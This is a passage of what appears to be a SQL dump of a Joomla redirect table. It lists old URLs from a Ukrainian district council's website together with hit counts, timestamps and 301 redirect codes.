00:00:00',301),(27752,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=489:2011-12-02-06-51-07&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 06:06:31','0000-00-00 00:00:00',301),(27753,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-30 06:06:32','0000-00-00 00:00:00',301),(27754,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=788:-lr-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 06:10:09','0000-00-00 00:00:00',301),(27755,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=671:2012-05-09-13-09-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 06:10:11','0000-00-00 00:00:00',301),(27756,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1376-pro-zatverdzhennya-poryadku-i-normativiv-vidrakhuvannya-chastini-pributku-dokhodu-komunalnikh-unitarnikh-pidpriemstv-ta-jikh-ob-ednan','','','',7,0,'2016-03-30 06:28:42','0000-00-00 00:00:00',301),(27757,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=505:2011-12-16-13-24-32&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 06:48:09','0000-00-00 00:00:00',301),(27758,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1292:-i-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 06:55:43','0000-00-00 00:00:00',301),(27759,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=910:-22-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 07:07:21','0000-00-00 00:00:00',301),(27760,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1102:2013-10-03-08-08-33&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 07:07:24','0000-00-00 00:00:00',301),(27761,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1279:2014-04-13-11-36-46&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 07:14:52','0000-00-00 00:00:00',301),(27762,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=864:------qq&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 07:23:20','0000-00-00 00:00:00',301),(27763,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1269:-3110&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 07:36:03','0000-00-00 00:00:00',301),(27764,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=910:-22-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 07:37:17','0000-00-00 00:00:00',301),(27765,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1063:2013-08-02-17-32-04&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 07:37:20','0000-00-00 00:00:00',301),(27766,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=605:-l-r-i-iii-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 07:48:10','0000-00-00 00:00:00',301),(27767,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=554:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 07:54:43','0000-00-00 00:00:00',301),(27768,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=333:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 08:48:36','0000-00-00 00:00:00',301),(27769,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=189:2010-12-15-13-21-57&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 08:48:37','0000-00-00 00:00:00',301),(27770,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=985:2013-04-12-09-53-08&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 08:50:30','0000-00-00 00:00:00',301),(27771,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=639:2012-04-03-12-41-18&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 08:55:41','0000-00-00 00:00:00',301),(27772,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=15&id=861:-qq&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 08:55:42','0000-00-00 00:00:00',301),(27773,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1202:2014-01-31-07-45-54&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 09:22:28','0000-00-00 00:00:00',301),(27774,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=688:2012-05-25-16-34-51&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 09:41:07','0000-00-00 00:00:00',301),(27775,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=944:-----l---r--------------&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 10:05:44','0000-00-00 00:00:00',301),(27776,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=802:-i-i-i-i-i&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 10:05:46','0000-00-00 00:00:00',301),(27777,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1125:2013-10-31-07-20-16&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 10:12:55','0000-00-00 00:00:00',301),(27778,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=619:-11-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 10:12:56','0000-00-00 00:00:00',301),(27779,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=18:2010-06-06-10-06-41&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 10:12:57','0000-00-00 00:00:00',301),(27780,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=319:-2009-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 10:31:14','0000-00-00 00:00:00',301),(27781,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/624-istorija-uspihu-tov-junigran','','','',4,0,'2016-03-30 10:32:57','0000-00-00 00:00:00',301),(27782,'http://www.malyn-rayrada.org.ua/index.php?id=45&Itemid=84&lang=uk&layout=blog&limitstart=30&option=com_content&view=category','','','',1,0,'2016-03-30 10:42:49','0000-00-00 00:00:00',301),(27783,'http://www.malyn-rayrada.org.ua/index.php?id=45:--14112012-&Itemid=3&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-30 10:44:16','0000-00-00 00:00:00',301),(27784,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=791:2012-10-17-06-06-34&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 10:45:27','0000-00-00 00:00:00',301),(27785,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=990:-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 10:45:28','0000-00-00 00:00:00',301),(27786,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=800:-----l--r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 10:45:29','0000-00-00 00:00:00',301),(27787,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1213:2014-02-14-13-53-12&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 10:52:32','0000-00-00 00:00:00',301),(27788,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=718:2012-06-14-15-24-50&Itemid=82&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 11:27:01','0000-00-00 00:00:00',301),(27789,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=530:-4050-vi-l-r-1-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 11:31:33','0000-00-00 00:00:00',301),(27790,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1166:2014-01-06-08-21-04&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 11:33:01','0000-00-00 00:00:00',301),(27791,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=737:2012-07-18-13-36-46&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 11:44:04','0000-00-00 00:00:00',301),(27792,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=767:2012-10-01-08-20-30&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 11:44:05','0000-00-00 00:00:00',301),(27793,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=614:2012-03-26-16-06-35&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 11:44:07','0000-00-00 00:00:00',301),(27794,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=883:-2012-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 11:50:09','0000-00-00 00:00:00',301),(27795,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1059:2013-07-24-05-42-15&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 11:50:10','0000-00-00 00:00:00',301),(27796,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=896:2013-01-17-07-42-35&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 11:50:49','0000-00-00 00:00:00',301),(27797,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=599:-l-r-2011-2016-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 11:57:52','0000-00-00 00:00:00',301),(27798,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=452:-20-2011-100-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 12:00:42','0000-00-00 00:00:00',301),(27799,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=582:2012-02-27-13-18-37&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 12:44:02','0000-00-00 00:00:00',301),(27800,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45?id=2010:&catid=2010&lang=uk','','','',2,0,'2016-03-30 13:01:09','0000-00-00 00:00:00',301),(27801,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=792:2012-10-17-06-26-37&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 13:10:59','0000-00-00 00:00:00',301),(27802,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1285:2014-04-17-16-55-05&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 13:17:33','0000-00-00 00:00:00',301),(27803,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&id=57&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-30 13:30:08','0000-00-00 00:00:00',301),(27804,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1063:2013-08-02-17-32-04&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 13:32:04','0000-00-00 00:00:00',301),(27805,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1195:2014-01-28-13-01-27&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 13:44:27','0000-00-00 00:00:00',301),(27806,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&catid=42:--16052012-&id=654:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 13:49:49','0000-00-00 00:00:00',301),(27807,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1292:-i-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 13:49:50','0000-00-00 00:00:00',301),(27808,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1050:2013-07-15-13-52-21&lang=en&option=com_content&view=article','','','',1,0,'2016-03-30 13:49:51','0000-00-00 00:00:00',301),(27809,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1093:-2017-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 13:49:51','0000-00-00 00:00:00',301),(27810,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=670:2012-05-08-05-15-51&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 14:12:17','0000-00-00 00:00:00',301),(27811,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1276:2014-04-10-13-26-15&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 14:12:18','0000-00-00 00:00:00',301),(27812,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1119:2013-10-25-12-26-37&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 14:43:41','0000-00-00 00:00:00',301),(27813,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=509:2011-12-20-08-03-11&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 14:43:43','0000-00-00 00:00:00',301),(27814,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=786:-5-18112009-429-l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 15:16:29','0000-00-00 00:00:00',301),(27815,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=466:-l-r-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 15:16:29','0000-00-00 00:00:00',301),(27816,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=717:2012-06-14-15-22-29&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 15:16:30','0000-00-00 00:00:00',301),(27817,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=741:---------l----r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 15:19:20','0000-00-00 00:00:00',301),(27818,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1096:2013-09-24-13-34-16&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 15:22:06','0000-00-00 00:00:00',301),(27819,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=441:-l-2011-2014-r-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 15:24:03','0000-00-00 00:00:00',301),(27820,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40&id=599:-l-r-2011-2016-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 15:35:19','0000-00-00 00:00:00',301),(27821,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/1-znajomtes-malinshhina','','','',5,0,'2016-03-30 15:43:43','0000-00-00 00:00:00',301),(27822,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&catid=34&id=344:2011-06-15-12-25-27&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 15:45:57','0000-00-00 00:00:00',301),(27823,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=919:2013-01-31-10-15-40&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 15:51:38','0000-00-00 00:00:00',301),(27824,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/1207-do-dnya-pratsivnikiv-lisu','','','',6,0,'2016-03-30 15:56:32','0000-00-00 00:00:00',301),(27825,'http://www.malyn-rayrada.org.ua/index.php?Itemid=12&catid=7&id=9:2010-06-05-15-10-04&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 16:34:47','0000-00-00 00:00:00',301),(27826,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=619:-11-6-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 16:41:12','0000-00-00 00:00:00',301),(27827,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=795:-20-2011-108-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 16:41:13','0000-00-00 00:00:00',301),(27828,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=729:-l20-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 16:50:19','0000-00-00 00:00:00',301),(27829,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1207:-2007-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 16:50:20','0000-00-00 00:00:00',301),(27830,'http://www.malyn-rayrada.org.ua/index.php?Itemid=96&catid=55&id=1167:--------l-r-------&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 17:02:41','0000-00-00 00:00:00',301),(27831,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=933:-2013-2017-&lang=ru&option=com_content&view=article','','','',3,0,'2016-03-30 17:06:57','0000-00-00 00:00:00',301),(27832,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=455:2011-11-10-13-39-05&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 17:06:58','0000-00-00 00:00:00',301),(27833,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-53-35','','','',3,0,'2016-03-30 17:18:22','0000-00-00 00:00:00',301),(27834,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=736:2012-07-18-13-34-35&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 17:44:54','0000-00-00 00:00:00',301),(27835,'http://www.malyn-rayrada.org.ua/index.php?Itemid=64&catid=32:2011-03-31-12-03-04&id=641:2012-04-03-12-52-00&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 17:44:55','0000-00-00 00:00:00',301),(27836,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=203:2010-12-15-14-10-45&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 18:12:56','0000-00-00 00:00:00',301),(27837,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=207:2010-12-15-14-22-39&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 18:38:57','0000-00-00 00:00:00',301),(27838,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=330:2011-05-20-16-28-08&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 18:41:18','0000-00-00 00:00:00',301),(27839,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=310:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 19:29:48','0000-00-00 00:00:00',301),(27840,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1296:116---&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 19:29:53','0000-00-00 00:00:00',301),(27841,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=735:2012-07-18-13-32-43&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 19:36:39','0000-00-00 00:00:00',301),(27842,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&id=31&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-30 19:36:40','0000-00-00 00:00:00',301),(27843,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=330:2011-05-20-16-28-08&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 19:36:42','0000-00-00 00:00:00',301),(27844,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=190:2010-12-15-13-24-17&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 19:38:11','0000-00-00 00:00:00',301),(27845,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1043:-------2013-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 19:43:54','0000-00-00 00:00:00',301),(27846,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=318:-2007-2011&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 19:52:00','0000-00-00 00:00:00',301),(27847,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=939:-18-&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 20:10:03','0000-00-00 00:00:00',301),(27848,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=468:-15-2011-120-l-r&lang=en&option=com_content&view=article','','','',1,0,'2016-03-30 20:11:05','0000-00-00 00:00:00',301),(27849,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01?start=7','','','',5,0,'2016-03-30 20:21:23','0000-00-00 00:00:00',301),(27850,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=627:2012-04-02-15-57-23&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 21:22:21','0000-00-00 00:00:00',301),(27851,'http://www.malyn-rayrada.org.ua/index.php?Itemid=80&id=42:--16052012-&lang=ru&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2016-03-30 21:23:43','0000-00-00 00:00:00',301),(27852,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=740:-lr-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 21:24:04','0000-00-00 00:00:00',301),(27853,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=843:-l-r&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 21:34:08','0000-00-00 00:00:00',301),(27854,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=503:-2017-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 21:35:36','0000-00-00 00:00:00',301),(27855,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=747:2012-08-03-09-21-28&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 21:46:19','0000-00-00 00:00:00',301),(27856,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=189:2010-12-15-13-21-57&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 21:46:20','0000-00-00 00:00:00',301),(27857,'http://www.malyn-rayrada.org.ua/index.php?id=38&Itemid=73&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-30 21:50:17','0000-00-00 00:00:00',301),(27858,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=744:2012-07-28-09-50-03&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 22:07:52','0000-00-00 00:00:00',301),(27859,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1088:2013-09-19-12-06-07&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 22:10:10','0000-00-00 00:00:00',301),(27860,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1200:2014-01-31-07-40-52&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 22:13:19','0000-00-00 00:00:00',301),(27861,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=714:2012-06-14-15-15-43&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 22:31:50','0000-00-00 00:00:00',301),(27862,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1043:-2013-&lang=ru&option=com_content&view=article','','','',2,0,'2016-03-30 22:52:09','0000-00-00 00:00:00',301),(27863,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-30 22:54:55','0000-00-00 00:00:00',301),(27864,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/425-visti-iz-vladivki-za-materialami-trs-polissja','','','',1,0,'2016-03-30 22:55:09','0000-00-00 00:00:00',301),(27865,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=212:2010-12-15-14-49-15&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-30 23:21:41','0000-00-00 00:00:00',301),(27866,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=309:----5----6--20--2011-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-30 23:22:20','0000-00-00 00:00:00',301),(27867,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1181:2014-01-22-06-06-13&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 23:22:21','0000-00-00 00:00:00',301),(27868,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-30 23:22:28','0000-00-00 00:00:00',301),(27869,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1191:-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2016-03-30 23:41:20','0000-00-00 00:00:00',301),(27870,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=890:2013-01-06-09-42-40&lang=en&option=com_content&view=article','','','',1,0,'2016-03-30 23:55:53','0000-00-00 00:00:00',301),(27871,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=736:2012-07-18-13-34-35&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 00:26:39','0000-00-00 00:00:00',301),(27872,'http://www.malyn-rayrada.org.ua/index.php?Itemid=61&id=30:--30122010-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 00:26:40','0000-00-00 00:00:00',301),(27873,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=618:2012-03-29-08-39-48&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 00:32:02','0000-00-00 00:00:00',301),(27874,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 00:34:47','0000-00-00 00:00:00',301),(27875,'http://www.malyn-rayrada.org.ua/index.php?id=43&Itemid=82&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-03-31 00:43:42','0000-00-00 00:00:00',301),(27876,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1012:l-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 00:45:38','0000-00-00 00:00:00',301),(27877,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=996:2013-04-25-12-09-57&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 00:51:18','0000-00-00 00:00:00',301),(27878,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&id=45:--14112012-&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 00:55:36','0000-00-00 00:00:00',301),(27879,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-09-34-01/30-iz-zhittja-rajonu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-03-31 00:56:11','0000-00-00 00:00:00',301),(27880,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=209:2010-12-15-14-27-50&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 00:58:33','0000-00-00 00:00:00',301),(27881,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/433-analiz-reguljatornogo-vplivu_2','','','',4,0,'2016-03-31 01:07:53','0000-00-00 00:00:00',301),(27882,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/45-analiz-reguljatornogo-vplivu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-03-31 01:07:55','0000-00-00 00:00:00',301),(27883,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1079:------l---2011-2013-r&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 01:21:02','0000-00-00 00:00:00',301),(27884,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=403:2011-09-29-05-41-20&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 01:33:20','0000-00-00 00:00:00',301),(27885,'http://www.malyn-rayrada.org.ua/index.php?Itemid=68&id=34:--15062011-&lang=ru&layout=blog&option=com_content&view=category','','','',1,0,'2016-03-31 01:42:47','0000-00-00 00:00:00',301),(27886,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=464:2011-11-11-12-15-19&lang=uk&option=com_content&view=article','','','',1,0,'2016-03-31 01:42:48','0000-00-00 00:00:00',301),(27887,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=964:-2013-2017-&lang=ru&option=com_content&view=article','','','',1,0,'2016-03-31 01:42:49','0000-00-00 